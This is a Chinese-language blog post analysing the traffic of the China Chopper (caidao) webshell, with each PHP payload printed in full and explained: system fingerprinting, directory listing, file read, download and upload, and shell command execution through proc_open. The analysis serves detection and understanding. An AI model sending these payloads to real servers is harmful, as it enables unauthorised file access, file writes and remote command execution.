<!DOCTYPE html>
<html lang=en>
<head><meta name="generator" content="Hexo 3.9.0">
    <!-- so meta -->
    <meta charset="utf-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="HandheldFriendly" content="True">
    <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
    <meta name="description" content="请求包一1234567891011121314151617@ini_set(&quot;display_errors&quot;, &quot;0&quot;);@set_time_limit(0);if (PHP_VERSION &amp;lt; &apos;5.3.0&apos;) &amp;#123;@set_magic_quotes_runtime(0);&amp;#125;;echo(&quot;X@Y&quot;);$D = dirname(__FILE__);$R = &quot;&amp;#123;$">
<meta property="og:type" content="article">
<meta property="og:title" content="caidao流量分析">
<meta property="og:url" content="https://naxg.online/2019/08/01/caidao流量分析/index.html">
<meta property="og:site_name" content="NAXG">
<meta property="og:description" content="请求包一1234567891011121314151617@ini_set(&quot;display_errors&quot;, &quot;0&quot;);@set_time_limit(0);if (PHP_VERSION &amp;lt; &apos;5.3.0&apos;) &amp;#123;@set_magic_quotes_runtime(0);&amp;#125;;echo(&quot;X@Y&quot;);$D = dirname(__FILE__);$R = &quot;&amp;#123;$">
<meta property="og:locale" content="en">
<meta property="og:updated_time" content="2019-08-01T15:52:28.404Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="caidao流量分析">
<meta name="twitter:description" content="请求包一1234567891011121314151617@ini_set(&quot;display_errors&quot;, &quot;0&quot;);@set_time_limit(0);if (PHP_VERSION &amp;lt; &apos;5.3.0&apos;) &amp;#123;@set_magic_quotes_runtime(0);&amp;#125;;echo(&quot;X@Y&quot;);$D = dirname(__FILE__);$R = &quot;&amp;#123;$">
    
    
        
          
              <link rel="shortcut icon" href="/images/favicon.ico">
          
        
        
          
            <link rel="icon" type="image/png" href="/images/favicon-192x192.png" sizes="192x192">
          
        
        
          
            <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon.png">
          
        
    
    <!-- title -->
    <title>caidao流量分析</title>
    <!-- styles -->
    <link rel="stylesheet" href="/css/style.css">
    <!-- persian styles -->
    
      <link rel="stylesheet" href="/css/rtl.css">
    
    <!-- rss -->
    
    
</head>

<body class="max-width mx-auto px3 ltr">
    
      <div id="header-post">
  <a id="menu-icon" href="#"><i class="fas fa-bars fa-lg"></i></a>
  <a id="menu-icon-tablet" href="#"><i class="fas fa-bars fa-lg"></i></a>
  <a id="top-icon-tablet" href="#" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');" style="display:none;"><i class="fas fa-chevron-up fa-lg"></i></a>
  <span id="menu">
    <span id="nav">
      <ul>
         
          <li><a href="/">Home</a></li>
         
          <li><a href="/about/">About</a></li>
         
          <li><a href="/archives/">Writing</a></li>
         
          <li><a href="http://github.com/naxg">Projects</a></li>
        
      </ul>
    </span>
    <br/>
    <span id="actions">
      <ul>
        
        <li><a class="icon" href="/2020/09/07/某堡垒机的明文密码获取/"><i class="fas fa-chevron-left" aria-hidden="true" onmouseover="$('#i-prev').toggle();" onmouseout="$('#i-prev').toggle();"></i></a></li>
        
        
        <li><a class="icon" href="/2019/07/10/Redis-Rce/"><i class="fas fa-chevron-right" aria-hidden="true" onmouseover="$('#i-next').toggle();" onmouseout="$('#i-next').toggle();"></i></a></li>
        
        <li><a class="icon" href="#" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');"><i class="fas fa-chevron-up" aria-hidden="true" onmouseover="$('#i-top').toggle();" onmouseout="$('#i-top').toggle();"></i></a></li>
        <li><a class="icon" href="#"><i class="fas fa-share-alt" aria-hidden="true" onmouseover="$('#i-share').toggle();" onmouseout="$('#i-share').toggle();" onclick="$('#share').toggle();return false;"></i></a></li>
      </ul>
      <span id="i-prev" class="info" style="display:none;">Previous post</span>
      <span id="i-next" class="info" style="display:none;">Next post</span>
      <span id="i-top" class="info" style="display:none;">Back to top</span>
      <span id="i-share" class="info" style="display:none;">Share post</span>
    </span>
    <br/>
    <div id="share" style="display: none">
      <ul>
  <li><a class="icon" href="http://www.facebook.com/sharer.php?u=https://naxg.online/2019/08/01/caidao流量分析/"><i class="fab fa-facebook " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="https://twitter.com/share?url=https://naxg.online/2019/08/01/caidao流量分析/&text=caidao流量分析"><i class="fab fa-twitter " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="http://www.linkedin.com/shareArticle?url=https://naxg.online/2019/08/01/caidao流量分析/&title=caidao流量分析"><i class="fab fa-linkedin " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="https://pinterest.com/pin/create/bookmarklet/?url=https://naxg.online/2019/08/01/caidao流量分析/&is_video=false&description=caidao流量分析"><i class="fab fa-pinterest " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="mailto:?subject=caidao流量分析&body=Check out this article: https://naxg.online/2019/08/01/caidao流量分析/"><i class="fas fa-envelope " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="https://getpocket.com/save?url=https://naxg.online/2019/08/01/caidao流量分析/&title=caidao流量分析"><i class="fab fa-get-pocket " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="http://reddit.com/submit?url=https://naxg.online/2019/08/01/caidao流量分析/&title=caidao流量分析"><i class="fab fa-reddit " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="http://www.stumbleupon.com/submit?url=https://naxg.online/2019/08/01/caidao流量分析/&title=caidao流量分析"><i class="fab fa-stumbleupon " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="http://digg.com/submit?url=https://naxg.online/2019/08/01/caidao流量分析/&title=caidao流量分析"><i class="fab fa-digg " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="http://www.tumblr.com/share/link?url=https://naxg.online/2019/08/01/caidao流量分析/&name=caidao流量分析&description="><i class="fab fa-tumblr " aria-hidden="true"></i></a></li>
</ul>

    </div>
    <div id="toc">
      <ol class="toc"><li class="toc-item toc-level-2"><a class="toc-link" href="#请求包一"><span class="toc-number">1.</span> <span class="toc-text">请求包一</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#读取文件"><span class="toc-number">2.</span> <span class="toc-text">读取文件</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#文件下载"><span class="toc-number">3.</span> <span class="toc-text">文件下载</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#文件上传"><span class="toc-number">4.</span> <span class="toc-text">文件上传</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#虚拟终端"><span class="toc-number">5.</span> <span class="toc-text">虚拟终端</span></a></li></ol>
    </div>
  </span>
</div>

    
    <div class="content index py4">
        
        <article class="post" itemscope itemtype="http://schema.org/BlogPosting">
  <header>
    
    <h1 class="posttitle" itemprop="name headline">
        caidao流量分析
    </h1>



    <div class="meta">
      <span class="author" itemprop="author" itemscope itemtype="http://schema.org/Person">
        <span itemprop="name">NAXG</span>
      </span>
      
    <div class="postdate">
      
        <time datetime="2019-08-01T15:31:15.000Z" itemprop="datePublished">2019-08-01</time>
        
      
    </div>


      

      

    </div>
  </header>
  

  <div class="content" itemprop="articleBody">
    <h2 id="请求包一"><a href="#请求包一" class="headerlink" title="请求包一"></a>请求包一</h2><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br></pre></td><td class="code"><pre><span class="line">@ini_set(<span class="string">"display_errors"</span>, <span class="string">"0"</span>);@set_time_limit(<span class="number">0</span>);</span><br><span class="line"><span class="keyword">if</span> (PHP_VERSION &lt; <span class="string">'5.3.0'</span>) &#123;@set_magic_quotes_runtime(<span class="number">0</span>);</span><br><span class="line">&#125;;</span><br><span class="line"><span class="keyword">echo</span>(<span class="string">"X@Y"</span>);</span><br><span class="line">$D = dirname(<span class="keyword">__FILE__</span>);</span><br><span class="line">$R = <span class="string">"&#123;$D&#125;\t"</span>;</span><br><span class="line"><span class="keyword">if</span> (substr($D, <span class="number">0</span>, <span class="number">1</span>) != <span class="string">"/"</span>) &#123;</span><br><span class="line">    <span class="keyword">foreach</span>(range(<span class="string">"A"</span>, <span class="string">"Z"</span>) <span class="keyword">as</span> $L) <span class="keyword">if</span> (is_dir(<span class="string">"&#123;$L&#125;:"</span>)) $R. = <span class="string">"&#123;$L&#125;:"</span>;</span><br><span class="line">&#125;</span><br><span class="line">$R. = <span class="string">"\t"</span>;</span><br><span class="line">$u = (function_exists(<span class="string">'posix_getegid'</span>)) ? @posix_getpwuid(@posix_geteuid()) : <span class="string">''</span>;</span><br><span class="line">$usr = ($u) ? $u[<span class="string">'name'</span>] : @get_current_user();</span><br><span class="line">$R. = php_uname();</span><br><span class="line">$R. = <span class="string">"(&#123;$usr&#125;)"</span>;</span><br><span class="line"><span class="keyword">print</span> $R;;</span><br><span class="line"><span class="keyword">echo</span>(<span class="string">"X@Y"</span>);</span><br><span class="line"><span class="keyword">die</span>();</span><br></pre></td></tr></table></figure>

<p>@ ini_set(“display_errors”, “0”)关闭PHP的错误显示<br>@set_time_limit(0)     设置程序的执行时间，应该是为了放在上传文件，执行命令回显超时等问题。<br>if (PHP_VERSION &lt; ‘5.3.0’) {@set_magic_quotes_runtime(0);};版本大于5.3.0就关闭，当传输的POST或者get数据存在反斜杆（\）、单引号（’）、双引号（”）等特殊字符是就自动加上(斜杠)。<br>echo(“X@Y”);用于反caidao返回数据的中定位用的，如X@Y12345X@Y,那么caidao就读出内容为12345,<br>if (substr($D, 0, 1) != “/“) {<br>    foreach(range(“A”, “Z”) as $L) if (is_dir(“{$L}:”)) $R. = “{$L}:”;<br>}<br>获取网站的绝对路径以及存在多少个盘.<br>$u = (function_exists(‘posix_getegid’)) ? @posix_getpwuid(@posix_geteuid())<br>获取当前进程的用户名，这个好像posix_geteuid()好像只有在linux下才有效<br>$usr = ($u) ? $u[‘name’] : @get_current_user();<br>获取执行脚本权限的用户名，比如www，system。<br>php_uname();返回了运行 PHP 的操作系统的描述</p>
<p>##请求包二</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br></pre></td><td class="code"><pre><span class="line">@ini_set(<span class="string">"display_errors"</span>, <span class="string">"0"</span>);@set_time_limit(<span class="number">0</span>);</span><br><span class="line"><span class="keyword">if</span> (PHP_VERSION &lt; <span class="string">'5.3.0'</span>) &#123;@set_magic_quotes_runtime(<span class="number">0</span>);</span><br><span class="line">&#125;;</span><br><span class="line"><span class="keyword">echo</span>(<span class="string">"X@Y"</span>);</span><br><span class="line">$D = <span class="string">'D:\\www\\security\\'</span>;</span><br><span class="line">$F = @opendir($D);</span><br><span class="line"><span class="keyword">if</span> ($F == <span class="keyword">NULL</span>) &#123;</span><br><span class="line">    <span class="keyword">echo</span>(<span class="string">"ERROR:// Path Not Found Or No Permission!"</span>);</span><br><span class="line">&#125; <span class="keyword">else</span> &#123;</span><br><span class="line">    $M = <span class="keyword">NULL</span>;</span><br><span class="line">    $L = <span class="keyword">NULL</span>;</span><br><span class="line">    <span class="keyword">while</span> ($N = @readdir($F)) &#123;</span><br><span class="line">        $P = $D.<span class="string">'/'</span>.$N;</span><br><span class="line">        $T = @date(<span class="string">"Y-m-d H:i:s"</span>, @filemtime($P));@$E = substr(base_convert(@fileperms($P), <span class="number">10</span>, <span class="number">8</span>), <span class="number">-4</span>);</span><br><span class="line">        $R = <span class="string">"\t"</span>.$T.<span class="string">"\t"</span>.@filesize($P).<span class="string">"\t"</span>.$E.<span class="string">"\n"</span>;</span><br><span class="line">        <span class="keyword">if</span> (@is_dir($P)) $M. = $N.<span class="string">"/"</span>.$R;</span><br><span class="line">        <span class="keyword">else</span> $L. = $N.$R;</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="keyword">echo</span> $M.$L;@closedir($F);</span><br><span class="line">&#125;;</span><br><span class="line"><span class="keyword">echo</span>(<span class="string">"X@Y"</span>);</span><br><span class="line"><span class="keyword">die</span>();</span><br></pre></td></tr></table></figure>

<p>@date(“Y-m-d H:i:s”, @filemtime($P));<br>获取“D:\www\security\”下的文件时间<br>@$E = substr(base_convert(@fileperms($P), 10, 8), -4)<br>文件权限以八进制的形式进行返回 如0777，0666</p>
<h2 id="读取文件"><a href="#读取文件" class="headerlink" title="读取文件"></a>读取文件</h2><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line">@ini_set(<span class="string">"display_errors"</span>, <span class="string">"0"</span>);@set_time_limit(<span class="number">0</span>);</span><br><span class="line"><span class="keyword">if</span> (PHP_VERSION &lt; <span class="string">'5.3.0'</span>) &#123;@set_magic_quotes_runtime(<span class="number">0</span>);</span><br><span class="line">&#125;;</span><br><span class="line"><span class="keyword">echo</span>(<span class="string">"X@Y"</span>);</span><br><span class="line">$F = <span class="string">'D:\\www\\security\\2008.php'</span>;</span><br><span class="line">$P = @fopen($F, <span class="string">'r'</span>);</span><br><span class="line"><span class="keyword">echo</span>(@fread($P, filesize($F)));@fclose($P);;</span><br><span class="line"><span class="keyword">echo</span>(<span class="string">"X@Y"</span>);</span><br><span class="line"><span class="keyword">die</span>();</span><br></pre></td></tr></table></figure>

<p>$P = @fopen($F, ‘r’);<br>echo(@fread($P, filesize($F)));@fclose($P);;<br>打开需要读取的文件，获取文件大小然后进行读取，读取完成后关闭打开的文件</p>
<h2 id="文件下载"><a href="#文件下载" class="headerlink" title="文件下载"></a>文件下载</h2><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line">@ini_set(<span class="string">"display_errors"</span>, <span class="string">"0"</span>);@set_time_limit(<span class="number">0</span>);</span><br><span class="line"><span class="keyword">if</span> (PHP_VERSION &lt; <span class="string">'5.3.0'</span>) &#123;@set_magic_quotes_runtime(<span class="number">0</span>);</span><br><span class="line">&#125;;</span><br><span class="line"><span class="keyword">echo</span>(<span class="string">"X@Y"</span>);</span><br><span class="line">$F = <span class="string">"D:\\www\\security\\2008.php"</span>;</span><br><span class="line">$fp = @fopen($F, <span class="string">'r'</span>);</span><br><span class="line"><span class="keyword">if</span> (@fgetc($fp)) &#123;@fclose($fp);@readfile($F);</span><br><span class="line">&#125; <span class="keyword">else</span> &#123;</span><br><span class="line">    <span class="keyword">echo</span>(<span class="string">'ERROR:// Can Not Read'</span>);</span><br><span class="line">&#125;;</span><br><span class="line"><span class="keyword">echo</span>(<span class="string">"X@Y"</span>);</span><br><span class="line"><span class="keyword">die</span>();</span><br></pre></td></tr></table></figure>
<p>使用fgetc（）函数判断文件是不是空的，是空的话跳过，不是空则用@readfile()进行读取并且下载</p>
<h2 id="文件上传"><a href="#文件上传" class="headerlink" title="文件上传"></a>文件上传</h2><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><span class="line">@ini_set(<span class="string">"display_errors"</span>, <span class="string">"0"</span>);@set_time_limit(<span class="number">0</span>);</span><br><span class="line"><span class="keyword">if</span> (PHP_VERSION &lt; <span class="string">'5.3.0'</span>) &#123;@set_magic_quotes_runtime(<span class="number">0</span>);</span><br><span class="line">&#125;;</span><br><span class="line"><span class="keyword">echo</span>(<span class="string">"X@Y"</span>);</span><br><span class="line">$f = <span class="string">'D:\\www\\security\\php.php'</span>;</span><br><span class="line">$c = $_POST[<span class="string">"z1"</span>];</span><br><span class="line">$c = str_replace(<span class="string">"\r"</span>, <span class="string">""</span>, $c);</span><br><span class="line">$c = str_replace(<span class="string">"\n"</span>, <span class="string">""</span>, $c);</span><br><span class="line">$buf = <span class="string">""</span>;</span><br><span class="line"><span class="keyword">for</span> ($i = <span class="number">0</span>; $i &lt; strlen($c); $i += <span class="number">2</span>) $buf. = urldecode(<span class="string">'%'</span>.substr($c, $i, <span class="number">2</span>));</span><br><span class="line"><span class="keyword">echo</span>(@fwrite(fopen($f, <span class="string">'w'</span>), $buf) ? <span class="string">'1'</span>: <span class="string">'0'</span>);;</span><br><span class="line"><span class="keyword">echo</span>(<span class="string">"X@Y"</span>);</span><br><span class="line"><span class="keyword">die</span>();</span><br><span class="line">&amp;z1=<span class="number">6161</span></span><br></pre></td></tr></table></figure>

<p>for ($i = 0; $i &lt; strlen($c); $i += 2) $buf. = urldecode(‘%’.substr($c, $i, 2));<br>echo(@fwrite(fopen($f, ‘w’), $buf) ? ‘1’: ‘0’);<br>&amp;z1=6161的值为16进制编码，把文件上次内容进行16进制编码然后使用urldecode进行16进制的解码，然后写入文件.</p>
<h2 id="虚拟终端"><a href="#虚拟终端" class="headerlink" title="虚拟终端"></a>虚拟终端</h2><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br></pre></td><td class="code"><pre><span class="line">@ini_set(<span class="string">"display_errors"</span>, <span class="string">"0"</span>);@set_time_limit(<span class="number">0</span>);</span><br><span class="line"><span class="keyword">if</span> (PHP_VERSION &lt; <span class="string">'5.3.0'</span>) &#123;@set_magic_quotes_runtime(<span class="number">0</span>);</span><br><span class="line">&#125;;</span><br><span class="line"><span class="keyword">echo</span>(<span class="string">"X@Y"</span>);</span><br><span class="line">$m = get_magic_quotes_gpc();</span><br><span class="line">$p = <span class="string">'cmd'</span>;</span><br><span class="line">$s = <span class="string">'cd /d D:\\www\\security\\&amp;whoami&amp;echo [S]&amp;cd&amp;echo [E]'</span>;</span><br><span class="line">$d = dirname($_SERVER[<span class="string">"SCRIPT_FILENAME"</span>]);</span><br><span class="line">$c = substr($d, <span class="number">0</span>, <span class="number">1</span>) == <span class="string">"/"</span> ? <span class="string">"-c \"&#123;$s&#125;\""</span>: <span class="string">"/c \"&#123;$s&#125;\""</span>;</span><br><span class="line">$r = <span class="string">"&#123;$p&#125; &#123;$c&#125;"</span>;</span><br><span class="line">$array = <span class="keyword">array</span>(<span class="keyword">array</span>(<span class="string">"pipe"</span>, <span class="string">"r"</span>), <span class="keyword">array</span>(<span class="string">"pipe"</span>, <span class="string">"w"</span>), <span class="keyword">array</span>(<span class="string">"pipe"</span>, <span class="string">"w"</span>));</span><br><span class="line">$fp = proc_open($r.<span class="string">" 2&gt;&amp;1"</span>, $array, $pipes);</span><br><span class="line">$ret = stream_get_contents($pipes[<span class="number">1</span>]);</span><br><span class="line">proc_close($fp);</span><br><span class="line"><span class="keyword">print</span> $ret;;</span><br><span class="line"><span class="keyword">echo</span>(<span class="string">"X@Y"</span>);</span><br><span class="line"><span class="keyword">die</span>();</span><br></pre></td></tr></table></figure>

<p>dirname($_SERVER[“SCRIPT_FILENAME”]获取当前可执行脚本的路径部分，如echo dirname(“C:/testweb/home.php”); 返回C:/testweb/<br>$c = substr($d, 0, 1) == “/“ ? “-c &quot;{$s}&quot;“: “/c &quot;{$s}&quot;“;判断获取到的路径是不是/开头的如果是则执行 /bin/sh -c “whoami”如果不是则会执行cmd /c “whoami”<br>/bin/sh 一般为/bin/<br>/bin/sh 相当于 /bin/bash –posix<br>/bin/sh -c “参数”如何不加-c参数，则shell会进入一个交互式的shell<br>Cmd /c “参数”执行完指定命令后然后终止</p>

  </div>
</article>



        
          <div id="footer-post-container">
  <div id="footer-post">

    <div id="nav-footer" style="display: none">
      <ul>
         
          <li><a href="/">Home</a></li>
         
          <li><a href="/about/">About</a></li>
         
          <li><a href="/archives/">Writing</a></li>
         
          <li><a href="http://github.com/naxg">Projects</a></li>
        
      </ul>
    </div>

    <div id="toc-footer" style="display: none">
      <ol class="toc"><li class="toc-item toc-level-2"><a class="toc-link" href="#请求包一"><span class="toc-number">1.</span> <span class="toc-text">请求包一</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#读取文件"><span class="toc-number">2.</span> <span class="toc-text">读取文件</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#文件下载"><span class="toc-number">3.</span> <span class="toc-text">文件下载</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#文件上传"><span class="toc-number">4.</span> <span class="toc-text">文件上传</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#虚拟终端"><span class="toc-number">5.</span> <span class="toc-text">虚拟终端</span></a></li></ol>
    </div>

    <div id="share-footer" style="display: none">
      <ul>
  <li><a class="icon" href="http://www.facebook.com/sharer.php?u=https://naxg.online/2019/08/01/caidao流量分析/"><i class="fab fa-facebook fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="https://twitter.com/share?url=https://naxg.online/2019/08/01/caidao流量分析/&text=caidao流量分析"><i class="fab fa-twitter fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="http://www.linkedin.com/shareArticle?url=https://naxg.online/2019/08/01/caidao流量分析/&title=caidao流量分析"><i class="fab fa-linkedin fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="https://pinterest.com/pin/create/bookmarklet/?url=https://naxg.online/2019/08/01/caidao流量分析/&is_video=false&description=caidao流量分析"><i class="fab fa-pinterest fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="mailto:?subject=caidao流量分析&body=Check out this article: https://naxg.online/2019/08/01/caidao流量分析/"><i class="fas fa-envelope fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="https://getpocket.com/save?url=https://naxg.online/2019/08/01/caidao流量分析/&title=caidao流量分析"><i class="fab fa-get-pocket fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="http://reddit.com/submit?url=https://naxg.online/2019/08/01/caidao流量分析/&title=caidao流量分析"><i class="fab fa-reddit fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="http://www.stumbleupon.com/submit?url=https://naxg.online/2019/08/01/caidao流量分析/&title=caidao流量分析"><i class="fab fa-stumbleupon fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="http://digg.com/submit?url=https://naxg.online/2019/08/01/caidao流量分析/&title=caidao流量分析"><i class="fab fa-digg fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="http://www.tumblr.com/share/link?url=https://naxg.online/2019/08/01/caidao流量分析/&name=caidao流量分析&description="><i class="fab fa-tumblr fa-lg" aria-hidden="true"></i></a></li>
</ul>

    </div>

    <div id="actions-footer">
        <a id="menu" class="icon" href="#" onclick="$('#nav-footer').toggle();return false;"><i class="fas fa-bars fa-lg" aria-hidden="true"></i> Menu</a>
        <a id="toc" class="icon" href="#" onclick="$('#toc-footer').toggle();return false;"><i class="fas fa-list fa-lg" aria-hidden="true"></i> TOC</a>
        <a id="share" class="icon" href="#" onclick="$('#share-footer').toggle();return false;"><i class="fas fa-share-alt fa-lg" aria-hidden="true"></i> Share</a>
        <a id="top" style="display:none" class="icon" href="#" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');"><i class="fas fa-chevron-up fa-lg" aria-hidden="true"></i> Top</a>
    </div>

  </div>
</div>

        
        <footer id="footer">
  <div class="footer-left">
    Copyright &copy; 2020 NAXG
  </div>
  <div class="footer-right">
    <nav>
      <ul>
         
          <li><a href="/">Home</a></li>
         
          <li><a href="/about/">About</a></li>
         
          <li><a href="/archives/">Writing</a></li>
         
          <li><a href="http://github.com/naxg">Projects</a></li>
        
      </ul>
    </nav>
  </div>
</footer>

    </div>
    <!-- styles -->
<link rel="stylesheet" href="/lib/font-awesome/css/all.min.css">
<link rel="stylesheet" href="/lib/justified-gallery/css/justifiedGallery.min.css">

    <!-- jquery -->
<script src="/lib/jquery/jquery.min.js"></script>
<script src="/lib/justified-gallery/js/jquery.justifiedGallery.min.js"></script>
<script src="/js/main.js"></script>
<!-- search -->

<!-- Google Analytics -->

<!-- Baidu Analytics -->

<!-- Disqus Comments -->


</body>
</html>
